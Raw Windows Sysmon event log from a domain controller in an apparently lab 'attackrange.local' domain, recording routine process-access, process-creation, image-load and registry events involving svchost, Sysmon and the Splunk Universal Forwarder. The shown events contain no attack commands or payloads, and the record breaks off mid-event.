10341000x80000000000000003106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E9F-6005-8F00-00000000A301}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.092{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E9F-6005-8F00-00000000A301}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.093{59A5CD1D-8E9F-6005-8F00-00000000A301}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x80000000000000003123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:27.999{59A5CD1D-8E56-6005-2C00-00000000A301}2588C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000003136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EA1-6005-9100-00000000A301}4988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EA1-6005-9100-00000000A301}4988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.406{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EA1-6005-9100-00000000A301}4988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:35:29.408{59A5CD1D-8EA1-6005-9100-00000000A301}4988C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000003139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:35:50.637{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9e-0xd615b810) 10341000x80000000000000003138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 